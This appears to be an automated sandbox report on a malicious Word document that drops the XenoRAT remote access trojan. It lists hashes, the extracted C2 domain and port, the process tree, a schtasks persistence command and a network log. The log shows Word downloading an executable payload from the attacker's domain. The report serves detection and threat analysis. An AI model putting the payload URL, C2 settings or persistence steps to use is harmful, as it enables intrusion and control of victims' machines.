Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-12-2024 05:41

General

  • Target

    7ea9da3dd3db6f3fadf04ac76b54434b.doc

  • Size

    195KB

  • MD5

    7ea9da3dd3db6f3fadf04ac76b54434b

  • SHA1

    b30b950191046d999e71aaa54fb2648c6655ce9b

  • SHA256

    947bce97211371e730a2b8b79c2ec4d154904e8faa7bed2583c5c6c420230170

  • SHA512

    f94eb382dedb8c3952dbc0f3b9040201455cec641c845bedf5765a2772aa98cb20d92b3e0edadcd92fd7cdb77e7c6f37d26bdd276cceea733237e28f04240f9d

  • SSDEEP

    3072:a877VGZ5Sd3b4e0wNZtsqXNKd5AvDJW4S+I/tZ6X1bpF6mfTm:DGZYwAZHMCDJ8/u5pAmbm

Malware Config

Extracted

Family

xenorat

C2

dns.stipamana.com

Mutex

Xeno_rat_nd8912d

Attributes
  • delay

    12000

  • install_path

    appdata

  • port

    4567

  • startup_name

    mrec

Signatures

  • Detect XenoRat Payload 1 IoCs
  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Xenorat family
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7ea9da3dd3db6f3fadf04ac76b54434b.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5076
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4400
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:544
        • C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
          "C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:216
          • C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
            C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
            5⤵
            • Executes dropped EXE
            PID:4456
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4456 -s 80
              6⤵
              • Program crash
              PID:3252
          • C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
            C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3928
          • C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
            C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:632
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3312
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3124
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\Admin\AppData\Local\Temp\tmpAA59.tmp" /F
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2168
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4456 -ip 4456
    1⤵
      PID:5032

    Network

    • flag-us
      DNS
      196.249.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.249.167.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      134.130.81.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      134.130.81.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      roaming.officeapps.live.com
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      roaming.officeapps.live.com
      IN A
      Response
      roaming.officeapps.live.com
      IN CNAME
      prod.roaming1.live.com.akadns.net
      prod.roaming1.live.com.akadns.net
      IN CNAME
      eur.roaming1.live.com.akadns.net
      eur.roaming1.live.com.akadns.net
      IN CNAME
      weu-azsc-000.roaming.officeapps.live.com
      weu-azsc-000.roaming.officeapps.live.com
      IN CNAME
      osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
      osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
      IN A
      52.109.89.19
    • flag-nl
      POST
      https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
      WINWORD.EXE
      Remote address:
      52.109.89.19:443
      Request
      POST /rs/RoamingSoapService.svc HTTP/1.1
      Cache-Control: no-cache
      Connection: Keep-Alive
      Pragma: no-cache
      Content-Type: text/xml; charset=utf-8
      User-Agent: MS-WebServices/1.0
      SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
      Content-Length: 511
      Host: roaming.officeapps.live.com
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Type: text/xml; charset=utf-8
      Server: Microsoft-IIS/10.0
      X-OfficeFE: RoamingFE_IN_126
      X-OfficeVersion: 16.0.18315.30575
      X-OfficeCluster: weu-000.roaming.officeapps.live.com
      Content-Security-Policy-Report-Only: script-src 'nonce-YATij8Nrs8K5byVybn+d7KdBtjcvv9dwlhXz6CPZvKmbNHgslxKADKTYSaNi4sBfpkid4sYqNQaVyvYJ1YAKQr9cmL1G2xtpJM+Buidspty0DGxtkjxsa7LRD8laDoxqWjPq2/dOM34VJoGeUFoyPsqg4zK+vsYZSsw/THr8TTc=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
      X-CorrelationId: b7930b3d-3646-4d03-ba89-e6855293b8ba
      X-Powered-By: ASP.NET
      Date: Mon, 09 Dec 2024 05:41:09 GMT
      Content-Length: 654
    • flag-us
      DNS
      www.stipamana.com
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.stipamana.com
      IN A
      Response
      www.stipamana.com
      IN A
      94.156.167.57
    • flag-bg
      GET
      https://www.stipamana.com/yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe
      WINWORD.EXE
      Remote address:
      94.156.167.57:443
      Request
      GET /yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: www.stipamana.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 09 Dec 2024 05:41:10 GMT
      Content-Type: application/octet-stream
      Content-Length: 177664
      Last-Modified: Mon, 09 Dec 2024 04:36:17 GMT
      Connection: keep-alive
      Keep-Alive: timeout=60
      ETag: "675673c1-2b600"
      Expires: Thu, 31 Dec 2037 23:55:55 GMT
      Cache-Control: max-age=315360000
      Accept-Ranges: bytes
    • flag-us
      DNS
      r10.o.lencr.org
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      r10.o.lencr.org
      IN A
      Response
      r10.o.lencr.org
      IN CNAME
      o.lencr.edgesuite.net
      o.lencr.edgesuite.net
      IN CNAME
      a1887.dscq.akamai.net
      a1887.dscq.akamai.net
      IN A
      88.221.134.115
      a1887.dscq.akamai.net
      IN A
      88.221.134.137
      a1887.dscq.akamai.net
      IN A
      88.221.135.106
      a1887.dscq.akamai.net
      IN A
      88.221.135.115
      a1887.dscq.akamai.net
      IN A
      88.221.134.89
      a1887.dscq.akamai.net
      IN A
      88.221.135.107
      a1887.dscq.akamai.net
      IN A
      88.221.134.107
      a1887.dscq.akamai.net
      IN A
      88.221.135.105
      a1887.dscq.akamai.net
      IN A
      88.221.134.91
    • flag-gb
      GET
      http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgP9IoBvxPBYG5AD8lLDTzup%2FQ%3D%3D
      WINWORD.EXE
      Remote address:
      88.221.134.115:80
      Request
      GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgP9IoBvxPBYG5AD8lLDTzup%2FQ%3D%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: r10.o.lencr.org
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Content-Type: application/ocsp-response
      Content-Length: 504
      ETag: "059D3BAE63C5A1873B0BF25DA52972542479B7F2C65A77BEA577C58029A90F01"
      Last-Modified: Mon, 09 Dec 2024 03:41:00 UTC
      Cache-Control: public, no-transform, must-revalidate, max-age=21593
      Expires: Mon, 09 Dec 2024 11:41:03 GMT
      Date: Mon, 09 Dec 2024 05:41:10 GMT
      Connection: keep-alive
    • flag-us
      DNS
      18.89.109.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.89.109.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      30.243.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      30.243.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      19.89.109.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      19.89.109.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      76.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      76.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      57.167.156.94.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      57.167.156.94.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      168.245.100.95.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      168.245.100.95.in-addr.arpa
      IN PTR
      Response
      168.245.100.95.in-addr.arpa
      IN PTR
      a95-100-245-168deploystaticakamaitechnologiescom
    • flag-us
      DNS
      115.134.221.88.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      115.134.221.88.in-addr.arpa
      IN PTR
      Response
      115.134.221.88.in-addr.arpa
      IN PTR
      a88-221-134-115deploystaticakamaitechnologiescom
    • flag-us
      DNS
      217.106.137.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      217.106.137.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      17.173.189.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      17.173.189.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      metadata.templates.cdn.office.net
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      metadata.templates.cdn.office.net
      IN A
      Response
      metadata.templates.cdn.office.net
      IN CNAME
      templatesmetadata.office.net
      templatesmetadata.office.net
      IN CNAME
      templatesmetadata.office.net.edgekey.net
      templatesmetadata.office.net.edgekey.net
      IN CNAME
      e26769.dscb.akamaiedge.net
      e26769.dscb.akamaiedge.net
      IN A
      92.123.26.217
      e26769.dscb.akamaiedge.net
      IN A
      92.123.26.202
    • flag-gb
      GET
      https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
      WINWORD.EXE
      Remote address:
      92.123.26.217:443
      Request
      GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: metadata.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Type: text/xml
      Server: Kestrel
      Content-Encoding: gzip
      Content-Length: 1264
      Cache-Control: max-age=253461
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Vary: Accept-Encoding
    • flag-us
      DNS
      28.118.140.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      28.118.140.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      binaries.templates.cdn.office.net
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      binaries.templates.cdn.office.net
      IN A
      Response
      binaries.templates.cdn.office.net
      IN CNAME
      binaries.templates.cdn.office.net.edgesuite.net
      binaries.templates.cdn.office.net.edgesuite.net
      IN CNAME
      a1847.dscg2.akamai.net
      a1847.dscg2.akamai.net
      IN A
      2.19.252.136
      a1847.dscg2.akamai.net
      IN A
      2.19.252.143
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328893.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 20235
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
      Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
      ETag: 0x8D36AC898C9059A
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7e7953a4-301e-000c-4e28-bf1d22000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0345751501.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 222992
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
      Last-Modified: Wed, 29 Aug 2018 18:20:50 GMT
      ETag: 0x8D60DDC26100537
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 6efd7f9e-101e-00b2-2f97-a0755b000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02835233.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 46413
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
      Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
      ETag: 0x8D36AC879BBB45C
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: bcca83ea-301e-000c-1015-b91d22000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0403392701.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 2527736
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 8laspQm0xsAUTSeMcDawqA==
      Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
      ETag: 0x8D60DDBDD02F94A
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 0e86dec0-501e-00d1-55b9-b9e8a0000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp01840907.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 43653
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
      Last-Modified: Fri, 22 Apr 2016 16:08:15 GMT
      ETag: 0x8D36AC84F8E1FB0
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: d47d4a02-201e-00a9-0e0f-ba4b58000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0345750301.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 640684
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
      Last-Modified: Wed, 29 Aug 2018 18:15:13 GMT
      ETag: 0x8D60DDB5D624CF0
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7adc3bba-701e-004d-4a96-8afe8b000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851216.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 34816
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: YoYxJM3NoTXswOcieCy4iA==
      Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
      ETag: 0x8D36AC8813CE0D3
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 4196af4e-901e-003f-4990-2d48e6000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03998158.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 42788
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: IaS3txYxwszaX7umN1Hw0g==
      Last-Modified: Fri, 22 Apr 2016 16:11:18 GMT
      ETag: 0x8D36AC8BD065412
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 620287b7-401e-00f2-3213-ba7263000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851217.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 33610
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
      Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
      ETag: 0x8D36AC881987151
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 0171b447-f01e-005b-359a-1db97e000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0345751001.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1065873
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
      Last-Modified: Wed, 29 Aug 2018 18:15:37 GMT
      ETag: 0x8D60DDB6BA6E455
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 9ae00d4d-001e-0028-7797-a0eb82000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
